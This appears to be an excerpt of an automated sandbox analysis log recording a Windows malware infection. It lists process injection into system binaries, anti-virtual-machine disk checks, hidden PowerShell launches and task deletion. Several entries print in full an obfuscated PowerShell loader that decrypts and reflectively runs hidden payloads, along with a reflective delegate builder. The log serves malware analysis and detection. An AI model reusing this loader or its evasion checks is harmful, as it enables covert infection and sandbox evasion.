Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2E80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 30B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 34D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2A3D0DE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 28FF0B90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2A3D0F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 24D03D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21336150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 28FF0B90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21350470000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 196FB050000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 196FB050000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A4E5670000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1FFFD320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8C8FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8CB040000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21350370000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:quvobnaugmmc{param([outputtype([type])][parameter(position=0)][type[]]$uwmlljvvwbvuvd,[parameter(position=1)][type]$qjfzfiqcry)$wljbmwfhupi=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+[char](101)+'f'+'l'+''+[char](101)+'c'+'t'+''+[char](101)+''+'d'+''+[char](68)+'e'+[char](108)+'e'+[char](103)+''+[char](97)+''+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+[char](110)+'m'+[char](101)+''+[char](109)+''+[char](111)+'r'+[char](121)+''+[char](77)+''+[char](111)+''+[char](100)+''+'u'+'l'+[char](101)+'',$false).definetype(''+[char](77)+'y'+'d'+'e'+'l'+''+'e'+''+[char](103)+'a'+[char](116)+'ety'+[char](112)+'e',''+[char](67)+''+'l'+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+''+'l'+''+[char](105)+''+[char](99)+''+','+''+[char](83)+''+[char](101)+''+[char](97)+''+[char](108)+''+[char](101)+'d'+[char](44)+''+'a'+''+'n'+'s'+[char](105)+''+'c'+''+[char](108)+''+[char](97)+''+'s'+''+[char](115)+','+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+[char](108)+'a'+[char](115)+''+[char](115)+'',[multicastdelegate]);$wljbmwfhupi.defineconstructor(''+[char](82)+'t'+'s'+''+[char](112)+''+[char](101)+''+'c'+''+[char](105)+''+[char](97)+''+[char](108)+'na'+[char](109)+''+'e'+','+[char](72)+''+[char](105)+''+[char](100)+'e'+'b'+''+'y'+''+'s'+''+[char](105)+''+[char](103)+',pu'+'b'+''+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$uwmlljvvwbvuvd).setimplementationflags(''+[char](82)+''+[char](117)+''+'n'+''+[char](116)+'i'+[char](109)+''+'e'+''+','+''+[char](77)+''+[char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[char](100)+'');$wljbmwfhupi.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+[char](111)+''+[char](107)+'e',''+[char](80)+'ubl'+[char](105)+''+[char](99)+''+[char](44)+''+[char](72)+''+[char](105)+'d'+'e'+''+[char](66)+''+'y'+''+[char](83)+''+[char](105)+''+'g'+','+'n'+'ew'+'s'+''+[char](108)+''+[char](111)+'t'+','+''+[char](86)+''+'i'+'rt'+'u'+''+[char](97)+''+[char](108)+'',$qjfzfiqcry,$uwmlljvvwbvuvd).setimplementationflags(''+'r'+''+[char](117)+'n'+'t'+''+'i'+'m'+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+[char](110)+''+[char](97)+'g'+[char](101)+''+[char](100)+'');write-output $wljbmwfhupi.createtype();}$ulnmlpdbsuvqn=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+'t'+[char](101)+''+[char](109)+'.d'+[char](108)+''+[char](108)+'')}).gettype(''+[char](77)+''+[char](105)+'c'+[char](114)+''+'o'+'s'+[char](111)+'f'+[char](116)+''+[char](46)+'wi'+'n'+'3'+'2'+''+[char](46)+''+'u'+''+[char](110)+''+[char](115)+''+[char](97)+''+[char](102)+''+[char](101)+'n'+'a'+'t'+'i'+''+[char](118)+'em'+[char](101)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,37_2_0000000140002300
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,37_2_0000000140002300
Source: dwm.exe, 00000029.00000000.2486830471.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000029.00000002.3084591324.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000022123C02AF0 cpuid 18_3_0000022123C02AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
